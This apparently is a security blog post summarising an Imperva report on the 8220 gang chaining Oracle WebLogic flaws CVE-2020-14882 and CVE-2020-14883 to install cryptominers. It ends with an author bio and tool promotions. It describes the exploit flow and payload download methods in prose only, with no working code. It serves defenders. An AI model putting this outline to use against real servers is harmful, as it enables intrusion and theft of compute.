In a recent report published on December 14th, 2023, cybersecurity leader Imperva shed light on a series of attacks exploiting vulnerabilities in Oracle WebLogic servers. Imperva’s Threat Research team detected increased activity from a Chinese state-sponsored group known as the 8220 gang, targeting WebLogic installations to deploy cryptojacking malware.
First spotted in 2017, the 8220 gang is notorious for mass malware campaigns that abuse new vulnerabilities as they are discovered. Their latest campaigns take advantage of authentication flaws and remote code execution bugs in WebLogic to breach servers and install Monero miners.
Imperva’s report contains valuable details about the attack vectors utilized by 8220, as well as indicators of compromise that can help organizations detect intrusions. We will examine the specific WebLogic vulnerabilities exploited, the techniques employed to compromise systems, and the malware installed to steal compute resources for illicit cryptocurrency mining. Understanding these latest cyber threats is the first step toward protecting critical infrastructure.
The 8220 gang, named after the port number frequently used in its campaigns, has been actively exploiting vulnerabilities to distribute cryptojacking malware since 2017. Security researchers attribute the group to Chinese state-sponsored hackers based on tactics, tools, and procedures.
Early operations targeted popular platforms like Drupal, Hadoop YARN, and Apache Struts, compromising systems to mine Monero. The group continues relying on recently disclosed bugs to breach servers from various manufacturers, including Oracle WebLogic, VMware, Redis, and Atlassian Confluence.
Once inside the network, the gang uses living-off-the-land binaries to move laterally and escalate privileges. A vast toolkit enables them to fingerprint systems, exploit additional weaknesses, and evade detection. Payloads often include coin miners tailored to the compromised architecture, configuration scripts, and backdoors for persistent access.
While the 8220 gang prioritizes stealth over destruction, the constant evolution of techniques makes them unpredictable and dangerous. Their operations generate substantial illicit profits through the theft of compute resources. Understanding this threat actor is key to protecting internet-facing infrastructure from server takeovers.
Imperva’s report details two critical Oracle WebLogic vulnerabilities chained together by the 8220 gang to achieve full remote code execution:
CVE-2020-14883 – This flaw allows an authenticated attacker to send crafted input to execute arbitrary system commands. The bug exists in a component that handles administrative operations.
CVE-2020-14882 – This flaw enables unauthenticated attackers to bypass authentication by sending maliciously crafted requests. Combining it with the previous RCE issue effectively eliminates the authentication requirement.
By chaining these two vulnerabilities, the 8220 gang can compromise Oracle WebLogic servers without needing any credentials. The attack flow involves sending HTTP requests to trigger CVE-2020-14882 and bypass auth first. Next, another request executes arbitrary code through CVE-2020-14883 to install malware.
These chained exploits enable the group to breach servers en masse with little effort. Organizations running vulnerable Oracle WebLogic installations are prime targets, especially those with internet-facing systems. Applying the latest security patches closes these exploitation vectors.
The 8220 gang has been exploiting vulnerabilities, specifically focusing on their methods and the nature of the vulnerabilities they target. Here’s a breakdown of the key technical details:
Method of Exploitation of CVE-2020-14883 & CVE-2020-14882 (Image Source: Imperva)
The gang uses two different gadget chains for their attacks. One of these enables the loading of an XML file, which then contains a call to the other, enabling command execution on the operating system (OS).
Different XML variations are used depending on the target OS. For Linux hosts, they attempt to download second-phase files using various methods such as cURL, wget, lwp-download, python urllib (base64 encoded), and a custom base64 encoded bash function.
For Windows hosts, they use a simple PowerShell WebClient command to execute a downloaded PowerShell script.
In another attack variant, they use a different gadget chain to execute Java code directly, without needing an externally hosted XML file. This injected Java code first determines the OS (Windows or Linux) and then executes the appropriate command strings.
According to Imperva’s telemetry, the 8220 gang does not focus on specific industries or countries when carrying out attacks. Recent campaigns have targeted healthcare, telecommunications, and financial services organizations in various regions like the United States, South Africa, Spain, Colombia, and Mexico.
The actors appear opportunistic in selecting which vulnerable WebLogic servers to exploit, lacking a defined targeting pattern. Any organization regardless of size or sector running outdated Oracle software is at potential risk. This demonstrates the importance of prompt patching and layered security controls to mitigate threats.
By taking advantage of any unpatched server they can compromise to deploy coin miners, the 8220 gang casts a wide net harvesting precious compute resources. Their broad attacks affect entities across both public and private sectors globally.
The 8220 gang exemplifies how threat actors now rapidly adopt innovations to outpace legacy defenses. Organizations must embrace emerging technologies like automation alongside pragmatic security to manage vulnerabilities proactively. Defending against persistent threats demands resilience through multi-layered monitoring, coordinated response, and machine-speed adaptation.
We hope this post helps you know about the new cyber attacks on Oracle WebLogic Servers. Please share this post and help secure the digital world.Visit our website thesecmaster.com, and our social media page on Facebook, LinkedIn, Twitter, Telegram, Tumblr, Medium, and Instagram and subscribe to receive updates like this.
You may also like these articles:
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.
“Knowledge Arsenal: Empowering Your Security Journey through Continuous Learning”
"Cybersecurity All-in-One For Dummies" offers a comprehensive guide to securing personal and business digital assets from cyber threats, with actionable insights from industry experts.
BurpGPT is a cutting-edge Burp Suite extension that harnesses the power of OpenAI's language models to revolutionize web application security testing. With customizable prompts and advanced AI capabilities, BurpGPT enables security professionals to uncover bespoke vulnerabilities, streamline assessments, and stay ahead of evolving threats.
PentestGPT, developed by Gelei Deng and team, revolutionizes penetration testing by harnessing AI power. Leveraging OpenAI's GPT-4, it automates and streamlines the process, making it efficient and accessible. With advanced features and interactive guidance, PentestGPT empowers testers to identify vulnerabilities effectively, representing a significant leap in cybersecurity.
Tenable BurpGPT is a powerful Burp Suite extension that leverages OpenAI's advanced language models to analyze HTTP traffic and identify potential security risks. By automating vulnerability detection and providing AI-generated insights, BurpGPT dramatically reduces manual testing efforts for security researchers, developers, and pentesters.
Microsoft Security Copilot is a revolutionary AI-powered security solution that empowers cybersecurity professionals to identify and address potential breaches effectively. By harnessing advanced technologies like OpenAI's GPT-4 and Microsoft's extensive threat intelligence, Security Copilot streamlines threat detection and response, enabling defenders to operate at machine speed and scale.